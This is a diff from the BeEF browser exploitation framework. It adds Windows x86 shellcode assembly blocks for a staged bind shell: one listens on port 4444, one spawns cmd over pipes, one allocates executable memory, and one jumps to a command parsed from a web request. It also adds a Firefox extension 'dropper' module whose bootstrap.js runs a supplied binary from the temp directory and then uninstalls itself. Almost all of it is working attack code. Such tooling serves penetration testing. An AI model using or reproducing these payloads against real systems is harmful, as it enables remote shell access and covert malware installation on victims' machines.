+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+find_cmd:		 ; Search for "cmd=" in the web request for our payload
+  cmp dword [esi], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc esi                ; point ebx to next char in request data
+  jmp short find_cmd     ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+;  add esi,4              ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command ... this compiles to 6 byte opcode
+  db 0x83, 0xC6, 0x04	 ; add esi,4 ... but only 3 byte opcode
+
+  jmp esi		 ; jump to our stage payload
+
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm

@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
+  push 0x5F327377        ; ...
+  push esp               ; Push a pointer to the "ws2_32" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "ws2_32" )
+  
+  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
+  sub esp, eax           ; alloc some space for the WSAData structure
+  push esp               ; push a pointer to this stuct
+  push eax               ; push the wVersionRequested parameter
+  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+  call ebp               ; WSAStartup( 0x0190, &WSAData );
+  
+  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
+  push eax               ; push null for reserved parameter
+  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
+  push eax               ; we do not specify a protocol
+  inc eax                ;
+  push eax               ; push SOCK_STREAM
+  inc eax                ;
+  push eax               ; push AF_INET
+  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
+  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+  xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
+  
+  xor ebx, ebx           ; Clear EBX
+  push ebx               ; bind to 0.0.0.0
+  push 0x5C110002        ; family AF_INET and port 4444
+  mov esi, esp           ; save a pointer to sockaddr_in struct
+  push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+  push esi               ; pointer to the sockaddr_in struct
+  push edi               ; socket
+  push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
+  call ebp               ; bind( s, &sockaddr_in, 16 );
+
+  push ebx               ; backlog
+  push edi               ; socket
+  push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
+  call ebp               ; listen( s, 0 );
+
+  push ebx               ; we set length for the sockaddr struct to zero
+  push ebx               ; we dont set the optional sockaddr param
+  push edi               ; listening socket
+  push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
+  call ebp               ; accept( s, 0, 0 );
+  
+  push edi               ; push the listening socket to close
+  xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
+  push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
+  call ebp               ; closesocket( s );
+  

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm

@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP is api_call
+; Output:
+;       esp+00	child stdin  read  file descriptor (inherited)
+;       esp+04	child stdin  write file descriptor (not inherited)
+;       esp+08	child stdout read  file descriptor (not inherited)
+;       esp+12	child stdout write file descriptor (inherited)
+;       esp+16	lpPipeAttributes structure (not used after block - 12 bytes)
+; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  push 1		 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
+  push 0
+  push 0x0C
+
+create_pipe_stdout:
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		 ; save location of where the child stdout Write file descriptor will be
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		 ; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+12]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+create_pipe_stdin:
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		; save location of where the child stdout Write file descriptor will be
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+20]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+no_inherit_read_handle:	 ; ensure read and write handles to child proc pipes for are not inherited
+  mov ebx,[esp+8] 
+  push 0
+  push 1
+  push ebx		 ; hChildStdoutRd is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp		 ; SetHandleInformation
+
+no_inherit_write_handle:
+  mov ebx,[esp+4]
+  push 0
+  push 1
+  push ebx		 ; hChildStdinRw is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp	 	 ; SetHandleInformation
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm

@@ -0,0 +1,56 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Credits: Some code borrowed from block_shell.asm; Stephen Fewer
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input:
+;	EBP is api_call
+;       esp+00  child stdin  read  file descriptor (inherited)
+;       esp+04  not used
+;       esp+08  not used
+;       esp+12  child stdout write file descriptor (inherited)
+; Output: None.
+; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+shell:
+  push 0x00646D63        ; push our command line: 'cmd',0
+  mov ebx, esp           ; save a pointer to the command line
+  push dword [esp+16]	 ; child stdout write file descriptor for process stderr
+  push dword [esp+20]	 ; child stdout write file descriptor for process stdout
+  push dword [esp+12]	 ; child stdin read file descriptor for process stdout
+  xor esi, esi           ; Clear ESI for all the NULL's we need to push
+  push byte 18           ; We want to place (18 * 4) = 72 null bytes onto the stack
+  pop ecx                ; Set ECX for the loop
+push_loop:               ;
+  push esi               ; push a null dword
+  loop push_loop         ; keep looping untill we have pushed enough nulls
+  mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+  lea eax, [esp + 16]    ; Set EAX as a pointer to our STARTUPINFO Structure
+  mov byte [eax], 68     ; Set the size of the STARTUPINFO Structure
+  ; perform the call to CreateProcessA
+  push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
+  push eax               ; Push the pointer to the STARTUPINFO Structure
+  push esi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+  push esi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+  push esi               ; We dont specify any dwCreationFlags 
+  inc esi                ; Increment ESI to be one
+  push esi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+  dec esi                ; Decrement ESI back down to zero
+  push esi               ; Set lpThreadAttributes to NULL
+  push esi               ; Set lpProcessAttributes to NULL
+  push ebx               ; Set the lpCommandLine to point to "cmd",0
+  push esi               ; Set lpApplicationName to NULL as we are using the command line param instead
+  push 0x863FCC79        ; hash( "kernel32.dll", "CreateProcessA" )
+  call ebp               ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+  ; perform the call to WaitForSingleObject
+;  mov eax, esp           ; save pointer to the PROCESS_INFORMATION Structure
+;  dec esi                ; Decrement ESI down to -1 (INFINITE)
+;  push esi               ; push INFINITE inorder to wait forever
+;  inc esi                ; Increment ESI back to zero
+;  push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
+;  push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
+;  call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm

@@ -0,0 +1,15 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: None. Sleeps for specified seconds.
+; Clobbers: None
+
+  push 1000                       ; milliseconds
+  push 0xE035F044                 ; hash (kernel32.dll, Sleep)
+  call ebp                        ; Sleep(1000ms)
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm

@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+; Clobbers: EAX, EBX, ECX, EDX
+
+  mov ebx,0x1000	 ; setup our flags and buffer size in ebx
+allocate_memory:         ; Alloc a buffer for the request and response data
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
+  push ebx               ; MEM_COMMIT
+  push ebx               ; size of memory to be allocated (4096 bytes)
+  push byte 0            ; NULL as we dont care where the allocation is
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+

modules/exploits/local_host/firefox_extension_dropper/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        firefox_extension_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Firefox Extension Dropper"
+            description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). <br/><br/> The extension is based on the original work from Michael Schierl and his Metasploit module."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]

modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt

@@ -0,0 +1,2 @@
+Place in this directory the binary you want to drop and execute through the Firefox extension.
+Make sure to have just ONE file in this directory (other than this readme.txt).

modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js

@@ -0,0 +1,30 @@
+
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
+  file.append(xpi_guid);
+  file.append(payload_name);
+  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("TmpD", Components.interfaces.nsIFile);
+  tmp.append(payload_name);
+  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+  file.copyTo(tmp.parent, tmp.leafName);
+    
+  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+  process.init(tmp);
+  process.run(false,[],0);
+      
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      }

modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt

@@ -0,0 +1 @@
+This is a temp directory where the Firefox extension will be built.

modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest

@@ -0,0 +1,2 @@
+content	{861fb387-92ce-bb0a-cb48-4b923dbc292b}	./
+overlay	chrome://browser/content/browser.xul	chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul

modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf

@@ -0,0 +1,24 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+  <Description about="urn:mozilla:install-manifest">
+    <em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
+    <em:name>__extension_name_placeholder__</em:name>
+    <em:version>1.0</em:version>
+    <em:bootstrap>true</em:bootstrap>
+    <em:unpack>true</em:unpack>
+    <em:targetApplication>
+      <Description>
+        <em:id>toolkit@mozilla.org</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    <em:targetApplication>
+      <Description>
+        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    </Description>
+</RDF>